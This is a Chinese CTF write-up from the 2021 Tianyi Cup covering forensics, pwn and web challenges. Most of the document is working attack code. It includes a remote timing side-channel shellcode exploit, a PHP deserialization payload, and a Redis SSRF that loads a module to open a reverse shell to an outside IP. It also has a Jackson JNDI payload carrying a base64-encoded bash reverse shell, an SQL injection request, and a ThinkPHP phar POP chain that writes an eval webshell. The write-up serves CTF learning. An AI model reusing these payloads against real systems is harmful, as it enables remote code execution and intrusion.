2021 第二届天翼杯wp

  • A+
所属分类:CTF专场

点击蓝字 ·  关注我们

01

Misc


签到

群公告

flag{e7gRR32wJJcHwQjwc2k9qFZ6fvn3gZ8P}



Browser

默认浏览器(请给出在注册表中可证明它是默认浏览器的对应的值,如:IE.HTTP) 一般都在注册表,耐心翻翻


./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 hivelist./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 hivelist -o 0x8f484880

2021 第二届天翼杯wp

http://www.360doc.com/content/14/0216/23/13813789_353089973.shtml


看到追加到注册表的地址


2021 第二届天翼杯wp


看到本地的表示


2021 第二届天翼杯wp


然后去检索win7 的注册表 
"SoftwareMicrosoftwindowsShellAssociationsUrlAssociationshttpUserchoice"


2021 第二届天翼杯wp

2021 第二届天翼杯wp

版本 :92.0.902.78

还缺个url那个东西在本地的Edge的缓存里面可以找到一共叫History的SQLite format 3的文件,检索下 然后dump下来

2021 第二届天翼杯wp

2021 第二届天翼杯wp


./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 dumpfiles -Q0x000000007da2abf0 -D ./

2021 第二届天翼杯wp

下载下来导入navicat

2021 第二届天翼杯wp

降序下然后就能看到 
https://weibo.com/login.php
拼接 
MSEdgeHTM_92.0.902.78_https://weibo.com/login.php
得到flag

02

Pwn


ezshell

from pwn import *elf=ELF('./chall')EXCV = context.binary = './chall'context.arch='amd64'def pwn(p, idx, c):# openshellcode = '''push 0x3a; pop rdi; xor rbx,rbx;inc bl;shl rbx,0x10;add rdi,rbx; xoresi, esi;open:push 2; pop rax; syscall;cmp al,0x4jl open'''# re open, rax => 0x14# read(rax, 0x10050, 0x50)shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x50;pop rsi;add rsi,rbx; syscall;"# cmp and jzif idx == 0:shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(idx,c)else:shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(idx,c)shellcode = asm(shellcode)p.recvuntil('======== Input your secret code ========n')p.send(shellcode.ljust(0x40-6, b'a') + b'./flag')idx = 0var_list = []while(1):for c in range(32, 127):p = remote("47.104.169.149",25178)# p=process('./chall')pwn(p, idx, c)start = time.time()try:p.recv(timeout=2)except:passend = time.time()p.close()if end-start > 1.5:var_list.append(c)print("".join([chr(i) for i in var_list]))breakelse:print("".join([chr(i) for i in var_list]))breakidx = idx + 1print("".join([chr(i) for i in var_list]))

03

Web


easy_eval


反序列化

<?phpclass a{public $code = "system('cat /*;id');";function __construct($code){$this->code = $code;}}class b{function __construct($code){$this->a = new a($code);}function __destruct(){echo $this->a->a();}}$c = new b('eval($_REQUEST[0]);');echo serialize($c);

把redis的so扩展上传到/tmp目录下 用fsockopen发起ssrf 打redis

<?phpfunction Getfile($host, $port, $link){$fp = fsockopen($host, intval($port), $errno, $errstr, 30);if(!$fp){echo "$errstr (error number $errno) n";}else{$out = "$link";//$out = "GET $link HTTP/1.1rn";//$out .= "HOST $host rn";//$out .= "Connection: Closernrn";//$out .= "rn";fwrite($fp, $out);$content = '';while(!feof($fp)){$contents .= fgets($fp, 1024);}fclose($fp);return $contents;}}$poc = "AUTH you_cannot_guess_itrn";$poc .= "module load /tmp/exp.sornsystem.rev 121.196.165.115 6663rn";$poc .= "infornquitrn";var_dump($poc);var_dump(Getfile("127.0.0.1","6379",$poc));

2021 第二届天翼杯wp

2021 第二届天翼杯wp


jackson

花生壳设置内网穿透安排恶意ldap服务

2021 第二届天翼杯wp

use exploit LDAPLocalChainListeneruse payload CommonsCollections8use bullet TransformerBulletset lport 9001set version 3set args 'set args 'bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzIuMjAxLjQ0Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}''run

ysomap直接用上面的payload 中转到服务器上接到shell

2021 第二届天翼杯wp



eztp

www.zip源码泄漏

2021 第二届天翼杯wp

POST /public/ HTTP/1.1Host: 8.134.37.86:26846User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0)Gecko/20100101 Firefox/92.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 100Origin: http://8.134.37.86:26846Connection: closeReferer: http://8.134.37.86:26846/public/index.phpCookie: PHPSESSID=7la556p4v160a8j1nhcholth1dusername[0]=not like&username[1][0]=%%&username[1][1]=233&username[2]=)union select 1,1#&password=1
注入登录进入后台 POP链
<?phpnamespace think {abstract class Model{protected $append;protected $error;public $parent;}}namespace thinkmodel {use thinkdbQuery;use thinkModel;use thinkmodelrelationHasOne;use thinkconsoleOutput;abstract class Relation{protected $query;protected $selfRelation;protected $parent;protected $foreignKey;protected $localKey;}class Pivot extends Model{public function __construct(){$this->append = ['mb' => 'getError'];$this->error = new HasOne();$this->parent = new Output();}}}namespace thinksessiondriver {use thinkcachedriverFile;class Memcached{protected $handler;public function __construct(){$this->handler = new File();}}}namespace thinkcachedriver {class File{protected $options;protected $tag;function __construct(){$this->options = ['expire' => 3600,'cache_subdir' => false,'prefix' => '','path' => 'php://filter/convert.iconv.utf-8.utf7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../../../../../../../../var/www/html/public/uploads/a.php','data_compress' => false,];$this->tag = 1;}}}namespace thinkdb {use thinkconsoleOutput;class Query{protected $model;public function __construct(){$this->model = new Output();}}}namespace thinkconsole {use thinksessiondriverMemcached;class Output{protected $styles;private $handle;public function __construct(){$this->styles = ['where'];$this->handle = new Memcached();}}}namespace thinkmodelrelation {use thinkModelRelation;use thinkdbQuery;use thinkconsoleOutput;abstract class OneToOne extends Relation{protected $bindAttr;}class HasOne extends OneToOne{public function __construct(){$this->selfRelation = 0;$this->query = new Output();$this->bindAttr = ['ccc', 'ccc'];$this->foreignKey = 'ccc';$o = new stdClass();$o->mb = 'ccc';$this->parent = $o;$this->localKey = 'mb';}}}namespace thinkprocesspipes {use thinkmodelPivot;class Windows{private $files;public function __construct(){$this->files = [new Pivot()];}}}namespace {use thinkprocesspipesWindows;// echo urlencode(base64_encode(serialize(new Windows())));$phar = new Phar("exp.phar"); //后缀名必须为 phar$phar->startBuffering();$phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>');$object = new Windows();$phar->setMetadata($object); //将自定义的 meta-data 存入 manifest$phar->addFromString("1.php", ""); //添加要压缩的文件//签名自动计算$phar->stopBuffering();rename("exp.phar", "exp.jpg");}
上传phar文件 使用listpic路由触发 phar反序列化 
http://8.134.37.86:24954/public/? s=admin/index/listpic&dir=phar:///var/www/html/public/static/img/person.jpg
 写入shell后 读取flag

2021 第二届天翼杯wp

2021 第二届天翼杯wp

00

Tip

你是否想要加入一个安全团

拥有更好的学习氛围?

那就加入EDI安全,这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心

EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事,我们在为打造安全圈好的技术氛围而努力,这里绝对是你学习技术的好地方。这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。

欢迎各位大佬小白入驻,大家一起打CTF,一起进步。    

我们在挖掘,不让你埋没!

你的加入可以给我们带来新的活力,我们同样也可以赠你无限的发展空间。

有意向的师傅请联系邮箱[email protected](带上自己的简历,简历内容包括自己的学习方向,学习经历等)

EDI安全

2021 第二届天翼杯wp

扫二维码|关注我们

一个专注渗透实战经验分享的公众号


相关推荐: 关于成立城市轨道交通信息安全专项工作n总体协调组和专家组的通知

城市轨道交通信息安全专项工作各有关单位:根据中国城市轨道交通协会工作安排,信息化专委会牵头开展城市轨道交通信息安全专项工作,围绕信息安全基础技术研究、标准体系建设、产品检测和认证、建立常态化安全服务机制、网络与信息安全培训五大方面开展,以提升行业整体信息安全防…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: